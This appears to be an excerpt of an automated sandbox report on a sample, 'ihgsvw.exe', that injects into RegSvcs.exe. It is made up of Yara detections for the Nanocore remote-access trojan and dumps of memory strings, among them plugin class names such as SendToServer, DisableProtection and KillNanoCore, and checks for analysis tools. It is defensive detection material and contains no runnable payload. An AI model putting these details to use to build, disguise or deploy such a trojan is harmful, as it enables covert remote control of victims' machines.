      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exeBinary or memory string: WIN_81
      Source: ihgsvw.exeBinary or memory string: WIN_XP
      Source: ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: ihgsvw.exeBinary or memory string: WIN_XPe
      Source: ihgsvw.exeBinary or memory string: WIN_VISTA
      Source: ihgsvw.exeBinary or memory string: WIN_7
      Source: ihgsvw.exeBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
